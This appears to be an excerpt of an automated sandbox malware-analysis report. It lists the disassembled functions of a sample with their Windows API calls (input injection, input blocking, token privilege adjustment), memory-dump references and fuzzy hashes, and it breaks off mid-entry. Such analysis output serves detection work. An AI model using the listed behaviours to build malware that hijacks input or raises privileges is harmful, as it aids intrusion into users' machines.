                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 69a0d5c6bba4f66824b39fb9e0244e29129fdbf750003c95966af9ed84c040a4
                        • Instruction ID: e45ce7ab6a5aa19628a51a1843cc86d454d5794d6c48a327555e8e5dc1c4697a
                        • Opcode Fuzzy Hash: 69a0d5c6bba4f66824b39fb9e0244e29129fdbf750003c95966af9ed84c040a4
                        • Instruction Fuzzy Hash: FDF0E5B06042282AE72067A69C4DFEB7AAEEFC5771F004165F609D2281DAA09944C7B0
                        Function 009EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009EB25D
                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 009EB270
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: InputSendkeybd_event
                        • String ID:
                        • API String ID: 3536248340-0
                        • Opcode ID: 7bfe5e66b1314890d6df509d7dab8bfcf8f2546ef969bf312148237f58e4b217
                        • Instruction ID: 4656370aaeb928d05c53b3271d23bc7dcc61ed9e660afb7f5f7ab733d2e0574d
                        • Opcode Fuzzy Hash: 7bfe5e66b1314890d6df509d7dab8bfcf8f2546ef969bf312148237f58e4b217
                        • Instruction Fuzzy Hash: 06F01D7184428DABDB06DFA1C805BEE7BB4FF04315F008409F965A5191C37986119F94
                        Function 009E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
                        • CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: 876b9c241da65ebfee1f27a50024c98f9cd59a6f310b5eb278b978f6c44342ed
                        • Instruction ID: bc600462ddede7f26dc5211f32617790f7e57ce59a73cf112aecbc1ef7a94a20
                        • Opcode Fuzzy Hash: 876b9c241da65ebfee1f27a50024c98f9cd59a6f310b5eb278b978f6c44342ed
                        • Instruction Fuzzy Hash: 22E04F32004610AFEB256B55FC05FB3B7A9EB04320F20C82DF4A5804B1DB626C90DB10
                        Function 0098CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                        Download Yara Rule
                        Strings
                        • Variable is not of type 'Object'., xrefs: 009D0C40
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable is not of type 'Object'.
                        • API String ID: 0-1840281001
                        • Opcode ID: ca21b1c79e35ad56b0147c289d43725f5dd9dcf9ddf9c7c7fb485c925eb336e3
                        • Instruction ID: 237572a9824d55ab8fd4209d92c4b513b19f71347b284880e549e037fc4e3638
                        • Opcode Fuzzy Hash: ca21b1c79e35ad56b0147c289d43725f5dd9dcf9ddf9c7c7fb485c925eb336e3
                        • Instruction Fuzzy Hash: FD32ACB0900218DFDF14EF94D881BEDB7B9BF85308F14845AE806AB392D775AE45CB60
                        Function 009B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009B6766,?,?,00000008,?,?,009BFEFE,00000000), ref: 009B6998
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 0589846c9924a94418393bc569f02ada4ffc7b0e1bd7267a500d671860a6b518
                        • Instruction ID: 95cbc31b8f97a5e5a2ce95d299399d563fc073a329adf00a9a7e75889ae99538
                        • Opcode Fuzzy Hash: 0589846c9924a94418393bc569f02ada4ffc7b0e1bd7267a500d671860a6b518
                        • Instruction Fuzzy Hash: B9B14D32510608DFDB15CF28C586BA57BE0FF45364F298658E899CF2A2C739E991CB40
                        Function 0099B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: ce1d3325800a2c2bcfb2852792884a9676a63e0ab1c75e76d3142233af8246bb
                        • Instruction ID: a06bfc7cf025996b45e41b9cd067a3fd666539d06b60738a69a3b179495d4e68
                        • Opcode Fuzzy Hash: ce1d3325800a2c2bcfb2852792884a9676a63e0ab1c75e76d3142233af8246bb
                        • Instruction Fuzzy Hash: C8126E759002299FCF24CF58D9817EEB7B9FF48710F14819AE849EB252DB349A81DF90
                        Function 009FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • BlockInput.USER32(00000001), ref: 009FEABD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 680fd4a4a625debc67c7fa589097fe1f3f23aab5a402e2e388465d2a3440b898
                        • Instruction ID: c27d842c3b6a84bfa84d5344db9792b03eb7ca354a9a61dbed5a025911bb38f2
                        • Opcode Fuzzy Hash: 680fd4a4a625debc67c7fa589097fe1f3f23aab5a402e2e388465d2a3440b898
                        • Instruction Fuzzy Hash: 68E01A752002049FD710EF59D804E9ABBE9AF98760F008416FD49C7361DA70E8418BA0
                        Function 009A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009A03EE), ref: 009A09DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 02b79721f2bbe7253eff5d8712cc9973861cce51cf7d08b17b682af878f2009c
                        • Instruction ID: b1f24d40c249058953428538a0e57ea5b9824cc859a9a90d66fa19601f6d79b7
                        • Opcode Fuzzy Hash: 02b79721f2bbe7253eff5d8712cc9973861cce51cf7d08b17b682af878f2009c
                        • Instruction Fuzzy Hash:
                        Function 009A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction ID: 4557397f1efb42b266cd4e75690e0bde83ce5fee815add57a66017f868a4cc99
                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction Fuzzy Hash: 6A51356260C6056BDB3885EC8C9F7BFE78D9B83340F18091AD886D7282CA1DDE45D3D6
                        Function 009B6DD9 Relevance: .6, Instructions: 637COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45e6d4afdbd5d2606eceac6d7bb8938e3534ef40204919e0bf1e28e00670289e
                        • Instruction ID: 7fa442219ddc8a2b4da4febef32f4ed9c3fa8bf28586446d6236d08d62a396ea
                        • Opcode Fuzzy Hash: 45e6d4afdbd5d2606eceac6d7bb8938e3534ef40204919e0bf1e28e00670289e
                        • Instruction Fuzzy Hash: 15320122D29F014DD7339678C922335A68DAFB73E5F15D737F81AB59A9EB29C4834200
                        Function 0099CC39 Relevance: .6, Instructions: 635COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7af43cc4e2ed9c9ded99e426b11dc461b5f8c5438a787838734098625c346984
                        • Instruction ID: 88459ba00d6a3648fce73c032a4e7a023f214973bb79a20d6011e4f48eb7a1fd
                        • Opcode Fuzzy Hash: 7af43cc4e2ed9c9ded99e426b11dc461b5f8c5438a787838734098625c346984
                        • Instruction Fuzzy Hash: D53205B2A801178BDF28CF68C89467D7BA9EB45301F28CD6BD489DB391E635DD81DB40
                        Function 00987920 Relevance: .6, Instructions: 563COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 117b22718237947a9e529b3ba6fee703f1244e3c018ca4b97bf894b8a1ee2c5e
                        • Instruction ID: 3522f4bff94667dd9a3e30eafdcfb5f3aa1e1d49d2c6cfcabb02be104adb03e3
                        • Opcode Fuzzy Hash: 117b22718237947a9e529b3ba6fee703f1244e3c018ca4b97bf894b8a1ee2c5e
                        • Instruction Fuzzy Hash: BE227E70E0460ADBDF14DFA4C941BAEB7B6FF84300F244529E816A7391EB36E951CB51
                        Function 009891C0 Relevance: .5, Instructions: 475COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 893f53d723f51eb507bba1ac62b238cf20b9059d7eb69e0bdfadcb444da68041
                        • Instruction ID: aca6331fb5bab3d980870478c845fd1acdf14f666cde8fb26ec67455ec5de2da
                        • Opcode Fuzzy Hash: 893f53d723f51eb507bba1ac62b238cf20b9059d7eb69e0bdfadcb444da68041
                        • Instruction Fuzzy Hash: C30281B1E0020AEBDF04DF54D881BAEB7B5FF84300F148569E8169B391EB35AE51CB91
                        Function 009A1C77 Relevance: .3, Instructions: 254COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                        • Instruction ID: 12ba86c54e4001be7f6d5b0b390a3f21670d8f6e383c4d21725ddafa5ba1ec42
                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                        • Instruction Fuzzy Hash: 0E9165722080E34ADB2D463E857403EFFE59A933B1B1A0B9ED4F2CA1C5FE24C954D660
                        Function 009A19B0 Relevance: .2, Instructions: 240COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                        • Instruction ID: 5234610e07a2399ee0ccbdaf49f87d88c98fa870e1615e4f66c121673aab4538
                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                        • Instruction Fuzzy Hash: AA91B2322090A34EDB2D427A857403EFFF95A933B2B1A079ED4F2CA1C5FE24C564D660
                        Function 009A7A4A Relevance: .2, Instructions: 237COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cce7e308a26ed1cefe69abd711f5f3a0a1ffc338f9c58f75ed1890d7aade6137
                        • Instruction ID: 5c6e32b0d67c2296adee997b3da0d0a37a1788db8cff56a9c0338885234c5be5
                        • Opcode Fuzzy Hash: cce7e308a26ed1cefe69abd711f5f3a0a1ffc338f9c58f75ed1890d7aade6137
                        • Instruction Fuzzy Hash: 1E6139B160870966DE349AE88D97BBFF39CDF83710F140D19E882DB281DA159E4283E5
                        Function 009A7CA7 Relevance: .2, Instructions: 237COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 602fa21d47bc1a734185e6adb1990ce9f31b30cf76068d9a7ca6f159d945241f
                        • Instruction ID: 3c99b57b3f95bed0b5b6c5b895ea2cc8f44e6e56dedb9b66cc106f53498fd4a3
                        • Opcode Fuzzy Hash: 602fa21d47bc1a734185e6adb1990ce9f31b30cf76068d9a7ca6f159d945241f
                        • Instruction Fuzzy Hash: 8F61783160870966DE384AE84C67BBFE39CEF83700F200D59E843CB2D1EA169D42C2D5
                        Function 009A1706 Relevance: .2, Instructions: 232COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                        • Instruction ID: 6be32cefebf9a669989ea5075a5c45744ac66d2ae5e5671281891e3d69e4563b
                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                        • Instruction Fuzzy Hash: B08187776090A30EDB6D423E853443EFFE55A933A1B1A079ED4F2CB1C1EE28C554E6A0
                        Function 00963630 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 28faaae2de63921fc4042e38bf6027d19305efb22da0fdee222ebb10d162e6c1
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 1141C4B1D1051CEBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                        Function 009F2046 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd6a01079ac20f018c1ed97dc08f8b9f8c34732ff98459d1dcd73203ada8b228
                        • Instruction ID: 6153cdae0ca99b331ab0b138bbbd601b8f0785471e84a6672b7ad7a3a9e08ab6
                        • Opcode Fuzzy Hash: bd6a01079ac20f018c1ed97dc08f8b9f8c34732ff98459d1dcd73203ada8b228
                        • Instruction Fuzzy Hash: 9321A8326206158BDB28CF79C81277A73E9B754310F19862EE4A7C37D0DE35A904C780
                        Function 00963520 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 4d524a4f0174df9fa6ca9feafd4c5964896521688e80471f461883c5be62bc89
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 2A019278A04209EFCB44DF98C6909AEF7B5FB48310F208599E809A7701D730AF41DB80
                        Function 009634C0 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
